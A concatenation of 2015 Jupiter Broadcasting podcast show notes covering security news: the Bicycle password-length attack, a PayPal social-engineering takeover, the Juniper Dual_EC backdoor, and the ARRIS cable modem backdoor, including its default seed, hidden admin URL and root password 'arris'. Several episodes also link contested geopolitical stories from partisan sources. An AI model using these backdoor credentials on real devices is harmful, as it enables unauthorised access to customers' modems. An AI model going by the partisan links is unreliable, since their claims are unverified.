• “In this paper I will show that for a presumably large subset of web applications, it is easy to infer the length of parts of the plaintext, or certain attributes thereof, from a recorded stream of encrypted messages. Having access to the private key is not necessary. In fact, the actual ciphertexts embedded in the stream are irrelevant to the deduction, and entry-level arithmetic suffices.”
• The attack can allow a passive listener to determine the length of your password, significantly reducing the effort required to brute force crack the password
• The attack takes advantage of the known characteristics of HTTP transactions (although it could be used against other protocols), to determine the length of a specific field
• In a regular HTTP form post, when a user is logging into a website, the post data consists of the form fields encoded as a string
• Something like: username=allan&password=correcthorsebatterystaple&sub=Login
• When the form is submitted over an encrypted connection (HTTPS), the text is not visible, however the length of the payload is known
• If the length of the form field names, and the username are known, then the length of the password can be determined
• So, this attack requires knowing the targets username, although that is not a problem during a targeted attack
• Most of the other information can be determined by the attacker by logging into an account on the site themselves
• The attack requires knowing things like the target user’s browser user-agent string, but this can be determined by them visiting any unencrypted website.
• The lengths of other headers, like user-agent and cookie, can be calculated by looking at requests to other known assets on the site, like an image or css file that is loaded by the login page
• With all of this information, the length of the packet, less the lengths of the known fields, leaves you with the length of the targets password
• This significantly reduces the complexity of a brute force attack
• If you know the password is exactly 12 characters long, you do not have to try every possible combination of 10, 11, 13, 14 etc character long passwords.
• Because of the nature of this attack, it also works against previously recorded sessions, even from years ago
• “It may also be executed on a larger scale on TOR exit nodes, VPN’s, proxies and other Internet traffic conduits in order to detect weak or short passwords susceptible to a brute-force or an attack based on a dictionary of often-used passwords”
• The name “Bicycle Attack” was chosen because: if you wrap a bicycle in giftwrap, you can still tell it is a bicycle
• The research then goes on to look at how this same concept can be applied to GPS coordinates, and IPv4 addresses. Just by knowing the length of the IP address, you can reduce the possible search space to only ~30% of the total. Some lengths cut the search space even more.

• #missioncomplete

• https://forums.freenas.org/index.php?threads/freenas-logo-design-contest.39968/

Merry Christmas: We stole your paypal account

• Alternative link, Krebs appears to be under a DDoS attack
• Krebs’ PayPal account was compromised on Christmas Eve
• “The perpetrator tried to further stir up trouble by sending my PayPal funds to a hacker gang tied to the jihadist militant group ISIS. Although the intruder failed to siphon any funds, the successful takeover of the account speaks volumes about why most organizations — including many financial institutions — remain woefully behind the times in authenticating their customers and staying ahead of identity thieves.”
• “On Christmas Eve morning, I received an email from PayPal stating that an email address had been added to my account. I immediately logged into my account from a pristine computer, changed the password, switched my email address back to to the primary contact address, and deleted the rogue email account.”
• “I then called PayPal and asked how the perpetrator had gotten in, and was there anything else they could do to prevent this from happening again? The customer service person at PayPal said the attacker had simply logged in with my username and password, and that I had done everything I could in response to the attack. The representative assured me they would monitor the account for suspicious activity, and that I should rest easy.”
• “Twenty minutes later I was outside exercising in the unseasonably warm weather when I stopped briefly to check email again: Sure enough, the very same rogue email address had been added back to my account. But by the time I got back home to a computer, my email address had been removed and my password had been changed. So much for PayPal’s supposed “monitoring;” the company couldn’t even spot the same fraudulent email address when it was added a second time.”
• “In my second call to PayPal, I insisted on speaking with a supervisor. That person was able to tell me that, as I suspected, my (very long and complex) password was never really compromised. The attacker had merely called in to PayPal’s customer support, pretended to be me and was able to reset my password by providing nothing more than the last four digits of my Social Security number and the last four numbers of an old credit card account.”
• “Let’s leave aside for a moment the reality that all of this static information about Brian Krebs has been posted online by various miscreants over the years (and probably remains online): Any company that authenticates customers with nothing more than static identifiers — address, SSN, DOB, phone number, credit card number, etc. — is vulnerable to these takeover attempts.”
• “I asked the PayPal supervisor why the company couldn’t simply verify my identity by sending a text message to my phone, or a special signal to a PayPal mobile app? After all, PayPal has had the same mobile number of mine on file for years (the attacker also deleted that number from my profile as well). The supervisor explained that the company didn’t have any mobile authentication technologies, and that in order to regain access to the funds in my account I had to send the company a photocopied or scanned copy of my driver’s license.”
• Not exactly something hard to fake, because I doubt they check it very carefully
• “When I pressed the PayPal representative about whether he had any other ways to validate my identity short of sending a copy of my license, he offered to do so “using public records.” Now, I understand that what he actually meant was that PayPal would work with a major credit bureau to ask me a series of so-called “out of wallet” or “knowledge-based authentication” (KBA) questions — essentially yet more requests for static information that can be gleaned from a variety of sources online. But that didn’t stop me from playfully asking the representative why a security challenge should rely on answers from public records? He responded that someone probably would have to go down to a courthouse somewhere to do that, which made me laugh out loud and wish him a Merry Christmas.”
• Krebs had a PayPal two-factor authentication token, but it apparently was not required to access the account
• A user in the comments points out: “A dynamic identifier, such as a temporary code sent via SMS to a user’s mobile phone, isn’t any better if the provider of the mobile service is also vulnerable. I had my bank accounts emptied after Vodafone UK allowed someone to walk in off the street and transfer my phone number to a new Vodafone account in store. Hugely frustrating that they could ever allow this.”

The Juniper Saga

• “On December 17, Juniper announced that some of their products were affected by “unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen® devices and to decrypt VPN connections”. That sounds like an attacker managed to subvert Juniper’s source code repository and insert a backdoor.”
• “Juniper followed up with a slightly more detailed post that noted that there were two backdoors: one via SSH and one that “may allow a knowledgeable attacker who can monitor VPN traffic to decrypt that traffic”. Either of these would be very interesting to a nation-state attacker but that latter—passive decryption of VPN connections—is really in their neighborhood.”
• “Dual-EC was an NSA effort to introduce a backdoored pseudo-random number generator (PRNG) that, given knowledge of a secret key, allowed an attacker to observe output from the RNG and then predict its future output. If an attacker can predict the output of the PRNG then they can know the keys that one or both sides of a VPN connection will choose and decrypt it. (For more details, see the research paper.)”
• “During the CRYPTO 2007 rump session, Niels Ferguson and Dan Shumow demonstrated that if the points are not randomly generated, but carefully chosen in advance, the security of Dual_EC DRBG can be subverted by the party doing the choosing; effectively backdooring the PRNG. Namely if one chooses P, Q such that Q=P*e holds for a value e that is kept secret, it will allow the party that generated said P, Q to recover the internal state of the PRNG from observed output in a computationally “cheap fashion” – hence instances of Dual_EC PRNG for which the provenance of the points P and Q is unknown are susceptible to having been backdoored.”
• “It stands to reason that whoever managed to slip in their own Q will also know the corresponding e such that P*e=Q (the value P was unchanged from the standard) and hence is able recover the internal state of the backdoored Dual_EC generator from the output generator. What is unknown however is what an attack would look like for the PRNG cascade employed by Juniper’s ScreenOS.”
• In the past, Juniper put out a KB article explaining their use of Dual_EC:
• “ScreenOS does make use of the Dual_EC_DRBG standard, but is designed to not use Dual_EC_DRBG as its primary random number generator. ScreenOS uses it in a way that should not be vulnerable to the possible issue that has been brought to light. Instead of using the NIST recommended curve points it uses self-generated basis points and then takes the output as an input to FIPS/ANSI X.9.31 PRNG, which is the random number generator used in ScreenOS cryptographic operations.”
• “However, apparently starting in August 2012 (release date according to release notes for 6.3.0r12), Juniper started shipping ScreenOS firmware images with a different point Q. Adam Caucill first noted this difference after HD Moore posted a diff of strings found in the SSG 500 6.2.0r14 and the 6.2.0r15 firmware. As we can deduce from their recent security advisory and the fact that they reverted back to the old value Q in the patched images, this was a change not authored by them. Apparently Juniper only realised this recently and not when they were issuing KB28205.”
• “Static analysis indicates that the output of the Dual_EC generator indeed is not used directly, but rather only to reseed an ANSI X9.31 PRNG. Besides the unused EC PRNG known-answer test function, a function we call reseed_system_prng is the only one that references the ec_prng_generate_output function”
• “Update: Shortly after reading my post, Willem Pinckaers pointed out that the reseed_system_prng function sets the global variable system_prng_bufpos to 32. This means that after the first invocation of this function, the for loop right after the reseed call in system_prng_gen_block never executes. Hence, the ANSI X9.31 PRNG code is completely non-functional.”
• “if it wasn’t the NSA who did this, we have a case where a US government backdoor effort (Dual-EC) laid the groundwork for someone else to attack US interests. Certainly this attack would be a lot easier given the presence of a backdoor-friendly RNG already in place. And I’ve not even discussed the SSH backdoor which, as Wired notes, could have been the work of a different group entirely. That backdoor certainly isn’t NOBUS—Fox-IT claim to have found the backdoor password in six hours”
• “NOBUS” is an intelligence community term for “nobody but us”

Feedback:

• Greylist mystery

• Top to Bottom security?

• Crowdsourced question

https://twitter.com/JohnLaTwC/status/682350922710659073

2/10 Adversaries need credentials more than malware. Avoid the sins of Windows credential administration. pic.twitter.com/8fOHSYDDkt

— John Lambert (@JohnLaTwC) December 31, 2015

3/10 Threat intel can be rewarding but beware the perils of the journey. pic.twitter.com/rzmCgfmNlL

— John Lambert (@JohnLaTwC) December 31, 2015

4/10 Look for ways to get early warning. The Inside Story of MS08-067: https://t.co/RR7CMMJ5jH pic.twitter.com/z1xUHNgEpF

— John Lambert (@JohnLaTwC) December 31, 2015

5/10 Attackers seek to turn illegitimate access into legitimate access. Find them after they submerge. pic.twitter.com/ZiFVyzu8JJ

— John Lambert (@JohnLaTwC) December 31, 2015

6/10 The point of the kill chain is not only to stop attacks early. It’s also that the fight isn’t over once they’re in. Assume Breach.

— John Lambert (@JohnLaTwC) December 31, 2015

7/10 Why poor infosec teams stay poor—understand the dangers of the Capability Chasm. pic.twitter.com/qN2r5WQ3xg

— John Lambert (@JohnLaTwC) December 31, 2015

8/10 Prevention is the guardian of detection. Prevention creates the whitespace to detect and respond to the most important things.

— John Lambert (@JohnLaTwC) December 31, 2015

9/10 Wonder why COTS isn’t enough? Know who you’re up against in the Adversary Matrix pic.twitter.com/g5ARVA4F0B

— John Lambert (@JohnLaTwC) December 31, 2015

https://twitter.com/JohnLaTwC/status/682352201927294976

Round Up:

• Malvertising campaign used a free certificate from Let’s Encrypt
• Hurricane Electric, the most peered transit provider on the Internet, would like to teach you to code. For free.
• Microsoft Got Hacked and Didn’t Tell Anyone
• Comparison of airgap bypass techniques
• Time Warner Cable Warns Some Customer Passwords May Be Compromised
• Dutch government comes out against backdooring encryption, commits 500,000 euros to OpenSSL
• Latest tech support scam stokes concerns Dell customer data was breached
• IETF Best Common Practices guide on using reverse dns
• Fraudsters Automate Russian Dating Scams
• Compile like it’s 1992
• Microsoft to kill off Internet Explorer 8, 9 and 10
• 191 million voter records exposed, no one wants to claim ownership of the database
• 18 million voter records contained detailed profiling data
• Facebook bug congratulates long time users on 46 years of being facebook friends, how?
• The Unreasonable Effectiveness of Adhesive Tape
• Looking at the breakdown for CVEs in 2015. Remember, this is not the entire story, some vendors fix many bugs with one CVE to keep their count low
• Gamer leaves SNES powered on for 20 years because battery in cartridge was flat and couldn’t retain saved game data
• Threat Post: Things to watch in 2016
• Uber Settles With New York Attorney General Over “God View” Tracking Program
• The Network Revolution required to support tele-surgery
• Google researchers finds that AVG anti-virus Chrome plugin can be exploited to steal cookies and browser history

The post Virtual Private Surveillance | TechSNAP 248 first appeared on Jupiter Broadcasting.

The US Government’s war on encryption is going from cold to hot. The stage has been set for a rough 2016 for US companies that employ encryption in their products. We’ll break down the major talking points for backdoors, intercepted communications & the general need to invade your privacy.

Plus the United States massive concessions in Syria your not being told about, big news for Drones & a little bit of good news in Unflter’s last episode of 2015!

Direct Download:

Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

Video Feed | MP3 Feed | OGG Feed | HD Torrent | Mobile Torrent | iTunes

Become an Unfilter supporter on Patreon:

Show Notes:

— Episode Links —

• Daesh Godfathers? Turkey, Saudi Arabia, Qatar Spotted Funding Terrorists
• How John McCain Crippled Obama’s War on ISIS | New Eastern Outlook
• US-backed Syrian rebel group on verge of collapse – Stripes
• The Pulse: New book suggests terror fears are overblown
• Plumber sues Ford dealer after truck with company logo was used by extremists in Syria – The Washington Post
• U.S. Working on Plan to Scrutinize Social Media in Visa Reviews – WSJ
• One Woman’s Case Proves: It’s Basically Impossible to Get Off the ‘No-Fly List’ – The Daily Beast
• Congress Drops All Pretense: Quietly Turns CISA Into A Full On Surveillance Bill | Techdirt
• Marco Rubio and Ted Cruz bicker over NSA at Las Vegas GOP debate 2015 | Daily Mail Online
• Federal Reserve embarks on historic new era of higher interest rates – MarketWatch
• San Bernardino Killers Did Not Post Public Terror Messages – NBC News
• Lawmakers Have Snuck CISA Into a Bill That Is Guaranteed to Become a Law | Motherboard
• U.S. Government Concedes to Putin After NATO’s Support of ISIS Exposed | The Free Thought Project
• News from The Associated Press
• Assad can stay, for now: Kerry accepts Russian stance
• Kelly McParland: Assad can stay. Once again U.S. capitulates to Russian demands on Syria | National Post
• No ‘regime change’ in Syria: After talks in Moscow, Kerry accepts Russian stance on Assad | Fox News

The post Terrorgram | Unfilter 170 first appeared on Jupiter Broadcasting.

It’s been a busy week, and there’s a lot of important news that’s been buried under a lot of junk news. Your Unfilter show is a healthy serving of news that really matters, like the real reason Turkey shot down a Russian Jet & why the Obama administration had their intelligence reports altered. It’s not what you’re being told.

Plus the latest crazy reasons to ban encryption, some breaking news & more!

Direct Download:

Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

Video Feed | MP3 Feed | OGG Feed | HD Torrent | Mobile Torrent | iTunes

Become an Unfilter supporter on Patreon:

Show Notes:

— Episode Links —

• Russia presents proof of Turkey’s role in ISIS oil trade — RT News
• British Parliament Approves Airstrikes Against ISIS in Syria – The New York Times
• Wesley Clark: ISIS “Serving Interests Of Turkey And Saudi Arabia,” “Someone’s Buying The Oil ISIS Is Selling” | Video | RealClearPolitics
• Obama’s Motorcade for Climate Change Talks Costing $784,825 – Washington Free Beacon
• ISIS Has 300 U.S. Ambassadors on Twitter, Report Says – NBC News
• Oil Plunge Raises Fears of Societal Unrest | Fox Business
• New Senate waste-watchers fill up ‘Federal Fumbles’ – Washington Times
• U.S. government reveals breadth of requests for Internet records – Yahoo News Canada
• Jeb Fights ISIS | Home
• The Intercept
• Here’s how Conan O’Brien gets news anchors to say the same thing – The Desk
• Putin: Russia Has Evidence Su-24 Shot Down to Protect Daesh Oil Deliveries
• Russia arms Su-34s with air-to-air missiles in Syria for 1st time — RT News
• The Great American Bubble Machine | Rolling Stone
• Globes English – Israel buys most oil smuggled from ISIS territory – report
• Russia has ‘more proof’ ISIS oil routed through Turkey, Erdogan says he’ll resign if it’s true — RT News
• Turkey’s Downing of Russian Jet Had to Be Pre-Planned – Retired US General
• Ankara’s oil business with ISIS — RT Business
• TASS: Russian Politics & Diplomacy – Russia planning no war with Turkey — FM
• Russia bombards Syrian rebels near site of downed Russian jet – Yahoo News Canada
• Turkish train carrying war tanks and weapons,delivered to ISIS – CNN iReport

The post Guarding Turkey's Oil | Unfilter 168 first appeared on Jupiter Broadcasting.

Encryption & privacy took quite a beating this week in the wake of the Paris attacks. We come to its defense. Your ISP heard you like backdoors, so they put a backdoor in your backdoor, the story of the social RAT & more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

The Paris Attacks Were An Intelligence Community Failure, Not An ‘Encryption’ Problem

• Less than two months ago that Techdirt noted that, having lost the immediate battle for US legislation to backdoor encryption, those in the intelligence community knew they just needed to bide their time until the next big terrorist attack.
• Here was the quote from Robert Litt — the top lawyer for the Office of the Director of National Intelligence from September:

“the legislative environment is very hostile today,” the intelligence community’s top lawyer, Robert S. Litt, said to colleagues in an August e-mail, which was obtained by The Post, “it could turn in the event of a terrorist attack or criminal event where strong encryption can be shown to have hindered law enforcement.”

• In the wake of the tragic events in Paris last week encryption has continued to be a useful bogeyman for those with a voracious appetite for surveillance expansion. Like clockwork, numerous reports were quickly circulated suggesting that the terrorists used incredibly sophisticated encryption techniques, despite no evidence by investigators that this was the case. These reports varied, the New York Times even having to pull one such report offline.

• Other claims the attackers had used encrypted Playstation 4 or WhatsApp communications.

• Over the past few days, Techdirt has been highlighting the fever pitch of pundits and officials trampling over themselves to blame Ed Snowden, blame encryption and demand (and probably get) new legislation to try to mandate backdoors to encryption.

• It now appears that the attackers communicated via unencrypted SMS and did little to hide their tracks.

• Ryan Gallagher at the Intercept notes, some of the attackers were already known to law enforcement and the intelligence community as possible problems. But they were still able to plan and carry out the attacks. Even more to the point, Gallagher points out that after looking at the 10 most recent high profile terrorist attacks, the same can be said for each of them

• The Intercept has reviewed 10 high-profile jihadi attacks carried out in Western countries between 2013 and 2015…, and in each case some or all of the perpetrators were already known to the authorities before they executed their plot.

• Are ISIS Geeks Using Phone Apps, Encryption to Spread Terror? – NBC News

• Paris Terrorists Used Double ROT-13 Encryption – Schneier on Security
• Signs Point to Unencrypted Communications Between Terror Suspects
• After Endless Demonization Of Encryption, Police Find Paris Attackers Coordinated Via Unencrypted SMS | Techdirt
• The Limits of The Panopticon — why the surveillance state failed
  

Backdoor in cable modem, contains backdoor

• Security researcher Bernardo Rodrigues was invited to give a talk at a security conference, and he decided to research the topic of Cable Modem security
• Unlike talks from years ago, this wasn’t about how to get free cable internet, but instead about “the security of the cable modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything’s really really bad.”
• “While researching on the subject, I found a previously undisclosed backdoor on ARRIS cable modems, affecting many of their devices including TG862A, TG862G, DG860A. As of this writing, Shodan searches indicate that the backdoor affects over 600.000 externally accessible hosts and the vendor did not state whether it’s going to fix it yet.”
• “ARRIS SOHO-grade cable modems contain an undocumented library (libarris_password.so) that acts as a backdoor, allowing privileged logins using a custom password”
• “ARRIS password of the day is a remote backdoor known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backdoor password. The default seed is MPSJKMDHAI and guess what – many ISPs won’t bother changing it at all.”
• “The backdoor account can be used to enable Telnet and SSH remotely via the hidden HTTP Administrative interface “https://192.168.100.1/cgi-bin/tech_support_cgi” or via custom SNMP MIBs”
• “The default password for the SSH user ‘root’ is ‘arris’. When you access the telnet session or authenticate over SSH, the system spawns the ‘mini_cli’ shell asking for the backdoor password”
• “Yes, they put a backdoor in the backdoor (Joel from Dlink is sure to be envy). The undocumented backdoor password is based on the last five digits from the modem’s serial number. You get a full busybox shell when you log on the Telnet/SSH session using these passwords.”
• The researchers marketing solution for the vulnerability? A old fashion keygen complete with chiptunes and ascii art
• The vulnerability was disclosed to CERT on 2015-09-13, and CERT has a 45 disclosure policy. The vendor has yet to correct the issue
• Ohh, and it seems there are more backdoors

The Story of the Social RAT-in-the-Browser

• A Remote Access Trojan (RAT) is a malicious malware that runs on your computer giving unlimited access to a cybercriminal who can then steal information or install other malicious software.
• They are able to operate under the radar of traditional security measures because a RAT’s installation mechanism is usually attached to a legitimate program, allowing an intruder to do just about anything on the targeted computer including, access confidential information, such as credit card and social security numbers, activate a system’s video or webcam, distribute malware, or alter files.
• RATs have been used by countries and hacktivists for many years, however recently, we’ve seen this remote access attack vector migrate to online banking fraud.
• These specific RATs, termed RAT-in-the-Browser (RitB), give cybercriminals access to banking credentials and account information.
• One of the reasons these Trojans have spread so rapidly is because banks often use traditional security measures such as device fingerprinting to validate a device’s reputation, assigning ‘risk’ to new or untrustworthy devices and assigning ‘trust’ to known user devices.
• RitB sessions are, therefore, often successful since these detection tools won’t find anything unusual.
• A Social RitB, adding another layer of complexity, as fraudsters are beginning to use social engineering to carry out remote access attacks. All a fraudster needs to do is convince a user to install a standard remote support tool on their computer — for example, Ammyy, UltraVNC, AeroAdmin, or RemotePC — and use it to perpetrate online banking fraud.
• This type of banking fraud is simple for cybercriminals to carry out since it doesn’t require the technical knowhow needed to develop malware and is easy to infect users through various exploitation mechanisms.
• Here’s how it works: a fraudster calls a user and convinces him or her that he or she is an employee of a reputable organization (i.e. an Internet service provider or bank), explains to the user that there is a security issue on his computer and then fools the user into downloading and installing a remote support tool (or gives the fraudster access to an existing tool already installed). The fraudster then convinces the user to login to his or her bank account for a quick ‘security check.’ And voilà, the attacker is in and can submit a fraudulent transaction. This is a relatively easy process for the criminal that requires far less technical know-how and monetary expenditure than a regular RitB attack.

Feedback:

• The Loopback Interface

• ZFS License and Linux

• account specific email accounts

• Respond on alternative to Active Directory

Round-Up:

• Telegram cracked down on 78 ISIS-related channels in 12 languages this week
• DDoS and the Internet’s liability problem
• French airport still uses Windows 3.1, has to go to ebay to get spare parts. Stopped all flights when it crashed
• A behind the scenes look at Facebook’s release engineering, and how they use bittorrent
• Police body cams found pre-installed with notorious Conficker worm
• Bypassing SMEP with vDSO on Linux
• Ads found emitting inaudible sounds from your Phone, Tablet, TV and PC, and listening on other devices to link your devices together
• Introducing “Chuckle” a tool to exploit lack of SMB signing
• Hardware signing of Docker instances with Yubikey
• LinkedIn fixes XSS that could have been used to spread a worm
• CoreOS Launches Clair, An Open-Source Tool For Monitoring Container Security
• It is way too easy to hack the hospital
• Tunnel all of your traffic over ICMP Echo requests and replies
• TubeMogul replaced 31 EC2 x2-large instances with 2 SuperMicro servers
• 15 sites to practice your pentesting skills
• Media Jacking — Tricking people into giving you access to their webcam

The post Double ROT-13 | TechSNAP 241 first appeared on Jupiter Broadcasting.

A new touchscreen display goes ons ale for the Raspberry Pi that nearly makes it a complete computer, researchers hack the sensors of self driving cars & we speculate rampantly about the iPad Pro, but definitely not the iPhone 6s!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Video Feed | Torrent Feed

Become a supporter on Patreon

Show Notes:

— Episode Links —

• Raspberry Pi’s official 7″ touchscreen display goes on sale today for $60 | VentureBeat | Dev | by Paul Sawers
• Researcher Hacks Self-driving Car Sensors – IEEE Spectrum
• Time to patch your firmware! Backdoor discovered into Seagate NAS drives

The post Speculated Apples | TTT 210 first appeared on Jupiter Broadcasting.

Top law enforcement officials in the US want backdoors in all encryption systems. What would the ramifications to open source around the world be if this became law of the land in the US?

Details on the upcoming road show, Kubuntu’s new look, saying goodbye to an old friend & some Go powered retro feedback.

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed | WebM Torrent Feed

Become a supporter on Patreon:

Show Notes:

Pre-Show:

• Linux Foundation is giving away Chromebooks | ITworld

• Xiaomi Plan To Release A Laptop That Runs Linux, Report Claims

Catch Up:

• Kubuntu | Friendly Computing

• Chrome will block obnoxious Flash ads starting September 1st

TING

• Ting – mobile that makes sense

Using gotty to expose my BBS to the web!

I was delighted to see that you guys covered gotty in the last episode of LAS. I just recently (about a week ago) started experimenting with gotty as a bridge between my telnet/SSH BBS and the web, and it’s been a pretty sweet experience so far. The author was very responsive on his GitHub page in walking me through a handful of issues I was having in getting the font setup correctly (since my board makes heavy use of textmode artwork). Check it out!

• The Go Programming Language

Go is an open source programming language that makes it easy to build
simple, reliable, and efficient software.

How does OSS Respond to State Backdoor Requirements?

NSA Boss: Encrypted Software Needs Government Backdoors

He remains adamant that technology companies should install government-friendly backdoors in encrypted products.

• NSA director defends plan to maintain ‘backdoors’ into technology companies | US news | The Guardian

DigitalOcean

• DigitalOcean: SSD Cloud Server, VPS Server, Simple Cloud Hosting

New name for the road show…

Chris mentioned he was looking for a silly name for the new mobile studio in his RV. Here you go, “The whole enchilada show”. OK, perhaps not that good, other ideas….

zircon_34

JB Road Show Essentials Wishlist

A list of important items we need for our road trip, thanks for the help, this lets us focus on big ticket mechanical and installation items!

Linux Academy

• Linux Academy | Linux and AWS Online Training

LILO to finish development of LILO at 12/2015

Any keystroke launcher diehards here? : LinuxActionShow

01org/thermal_daemon · GitHub

Runs Linux from the people:

• Send in a pic/video of your runs Linux.
• Please upload videos to YouTube and submit a link via email or the subreddit.

Support Jupiter Broadcasting on Patreon

The post Insecurity by Design | LINUX Unplugged 108 first appeared on Jupiter Broadcasting.

The Backronym vulnerability hits MySQL right in the SSL protection, we’ll share the details. The hacker Group that hit Apple & Microsoft intensifies their attacks & a survey shows many core Linux tools are at risk.

Plus some great questions, a rockin’ roundup & much much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Backronym – ssl stripping mysql connections

• Researchers have identified a serious vulnerability in some versions of MySQL that allows an attacker to strip SSL/TLS connections of their security wrapping transparently.
• Researchers at Duo Security realized that even when they set the correct option to initiate an SSL connection with the MySQL server, they could not make the client enforce a secure connection.
• This means that an attacker with a man-in-the-middle position could force an unencrypted connection and passively sniff all of the unencrypted queries from the client to the MySQL database.
• The vulnerability lies within the behaviour of the ‘–ssl’ client option, which on affected versions it is being treated as “advisory”. Therefore while the option would attempt an SSL/TLS connection to be initiated towards a server, it would not actually require it. This allows a MITM attack to transparently “strip” the SSL/TLS protection.
• The issue affects the ssl client option whether used directly or triggered automatically by the use of other ssl options.
• The vulnerability affects MySQL 5.7.2 and earlier versions, along with MySQL Connector versions 6.1.2 and earlier, all versions of Percona Server and all versions of MariaDB.
• The vulnerability is nicknamed BACKRONYM (Bad Authentication Causes Kritical Risk Over Networks Yikes MySQL) by the Duo researchers, who also put up a site that riffs on the recent trend of researchers putting up sites for major vulnerabilities.
• What does BACKRONYM stand for? Bad Authentication Causes Kritical Risk Over Networks, Yikes MySQL!
• They say: “We spent countless hours analyzing the BACKRONYM vulnerability to come up with a human-readable description that would convey the underlying root-cause to infosec professionals.”
• What do I need to do to fix BACKRONYM?
• Step 1: PANIC! I mean look at that logo – your database is basically exploding!
• Step 2: Tell all your friends about BACKRONYM. Use your thought leadership talents to write blog post about BACKRONYM to reap sweet Internet karma. Leverage your efforts in responding to BACKRONYM to build political capital with the executives in your organization. Make sure your parents know it’s not safe to shop online until BACKRONYM is eradicated.
• Step 3: Actually remediate the vulnerability in any of your affected MySQL client-side libraries (also MariaDB and Percona). Unfortunately, there’s no patch backported for MySQL <= 5.7.2. So if you’re on MySQL 5.6 like 99.99% of the Internet is, you’re basically out of luck and have to upgrade to the MySQL 5.7 “preview release” or figure out how to pull in libmysqlclient >= 6.1.3. Backporting security fixes is hard, apparently.
• Additional Coverage: New PHP release to fix backronym flaw
• The BACKRONYM Vulnerability

Hacker Group That Hit Twitter, Facebook, Apple and Microsoft Intensifies Attacks

• The hacker group, which security researchers from Kaspersky Lab and Symantec call Wild Neutron or Morpho, has broken into the networks of over 45 large companies since 2012.
• After the 2013 attacks against Twitter, Facebook, Apple and Microsoft were highly publicized, the group went underground and temporarily halted its activity.
• Symantec has named the group behind the attacks “Butterfly”.
• Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target.
• The first signs of Butterfly’s activities emerged in early 2013 when several major technology and internet firms were compromised. Twitter, Facebook, Apple and Microsoft disclosed that they had been compromised by very similar attacks. This was done by compromising a website used by mobile developers (that we covered before on the show) using a Java zero-day exploit to infect them with malware.
• The malware used in these attacks was a Mac OS X back door known as OSX.Pintsized. Subsequent analysis by security researcher Eric Romang identified a Windows back door, Backdoor.Jiripbot, which was also used in the attacks.
• Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly.
• Butterfly has also shown an interest in the commodities sector, attacking two major companies involved in gold and oil in late 2014. In addition to this, the Central Asian offices of a global law firm were compromised in June 2015. The company specializes in finance and natural resources specific to that region. The latter was one of at least three law firms the group has targeted over the past three years.
• Butterfly has also developed a number of its own hacking tools. Hacktool.Securetunnel is a modified version of OpenSSH which contains additional code to pass a command-and-control (C&C) server address and port to a compromised computer.
• Hacktool.Bannerjack is meanwhile used to retrieve default messages issued by Telnet, HTTP, and generic Transmission Control Protocol (TCP) servers. Symantec believes it is used to locate any potentially vulnerable servers on the local network, likely including printers, routers, HTTP servers, and any other generic TCP server.
• The group uses Hacktool.Eventlog to parse event logs, dumping out ones of interest, and delete entries. It also kills processes and performs a secure self-delete. Hacktool.Proxy.A is used to create a proxy connection that allows attackers to route traffic through an intermediary node, onto their destination node.
• Based on the profile of the victims and the type of information targeted by the attackers, Symantec believes that Butterfly is financially motivated, stealing information it can potentially profit from. The group appears to be agnostic about the nationality of its targets, leading us to believe that Butterfly is unaffiliated to any nation state.
• Links:
• Butterfly: Profiting from high-level corporate attacks | Symantec Connect Community
• Hacktool.Securetunnel | Symantec
• Wild Neutron – Economic espionage threat actor returns with new tricks – Securelist

Core Linux tools top list of most at-risk software

• The CII (Core Infrastructure Initiative), a Linux Foundation effort assembled in the wake of the Heartbleed fiasco to provide development support for key Internet protocols, has opened the doors on its Census Project — an effort to figure out what projects need support now, instead of waiting for them to break.
• The Census, with both its code and results available on GitHub, assembles metrics about open source projects found in Debian Linux’s package list and on openhub.net, then scores them based on the amount of risk each presents.
• A copy of the census data downloaded from GitHub on Friday morning showed 395 projects in the census, with the top-listed projects to be core Linux utilities. Ftp, netcat-traditional, tcpd, and whois all scored 11 out of a possible 15.
• High scores in the survey, said the CII in its page on the project, don’t mean a given program should be ditched, or that it’s to be presumed vulnerable. Rather, it means “the project may not be getting the attention that it deserves and that it merits further investigation.”
• Apache’s https Web server, a large and “vitally important” project with many vulnerabilities tracked over the years, ranked as an 8 in part because “there’s already large development & review team in place.”
• Busybox, a project found in many embedded Linux applications that has been implicated before with security concerns, ranked even lower, at 6.
• One of tricky issues that bubbles up is the complications posed by dependencies between projects. For the libaprutil1-ldap project (with a score of 8), the notes indicate that “the general Apache Portable Runtime (APR) appears to be actively maintained. However, it’s not as clear that the LDAP library in it is as actively managed.” Likewise, anything that uses the Kerberos authentication system — recently implicated in a security issue — typically has “Kerberos” in the notes.
• linuxfoundation/cii-census · GitHub

Feedback:

• 6gig SAS

• fail2ban

• Colo or No-Go

Round Up:

• International cybercrime marketplace taken down
• Larry Wall on Perl 6 and teaching kids to code
• Uninstalled Google Photos? Thought your pics safe from slurping? WRONG, bozo
